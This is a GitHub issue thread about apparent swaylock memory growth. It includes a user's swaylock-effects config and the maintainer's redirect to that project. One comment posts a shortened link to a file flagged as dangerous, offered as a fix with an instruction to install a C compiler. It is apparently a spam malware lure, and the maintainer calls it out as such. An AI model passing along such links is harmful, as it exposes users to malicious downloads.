### ISSUE TITLE
Memory leak?

### ISSUE THREAD

**Issue by JasonGrace2282** [swaywm/swaylock#374]
While using swaylock, my memory usage % steadily goes up, sometimes even triggering the OOM killer. I've confirmed that the process using up the memory is swaylock (via `htop`).

My config:
```
daemonize
show-failed-attempts
clock
screenshot
effect-blur=15x15
effect-vignette=1:1
color=1f1d2e80
font="Inter"
indicator
indicator-radius=200
indicator-thickness=20
line-color=1f1d2e
ring-color=191724
inside-color=1f1d2e
key-hl-color=0BE9A1
separator-color=00000000
text-color=e0def4
text-caps-lock-color=""
line-ver-color=0BE9A1
ring-ver-color=0BE9A1
inside-ver-color=1f1d2e
text-ver-color=e0def4
ring-wrong-color=31748f
text-wrong-color=31748f
inside-wrong-color=1f1d2e
inside-clear-color=1f1d2e
text-clear-color=e0def4
ring-clear-color=9ccfd8
line-clear-color=1f1d2e
line-wrong-color=1f1d2e
bs-hl-color=31748f
datestr=%a, %B %e
timestr=%I:%M %p
fade-in=0.3
ignore-empty-password
```

**Comment by Buqra55** [comment]
maybe this will help
https://bit.ly/4gwC82r
If you don't have the c compliator, install it.(gcc or clang)

**Comment by JasonGrace2282** [comment]
> maybe this will help https://bit.ly/4gwC82r If you don't have the c compliator, install it.(gcc or clang)

The link you sent doesn't seem to work for me, mediafire says it's a dangerous file.
Thanks for the quick response :)

**Comment by kennylevinsen** [comment]
@JasonGrace2282 You seem to be running swaylock-effects, not swaylock, so please post your issue there instead. Closing for now - feel free to re-open if you are running upstream swaylock (which does not have e.g. blur effects).

Also, avoid clicking links from spam accounts. :)
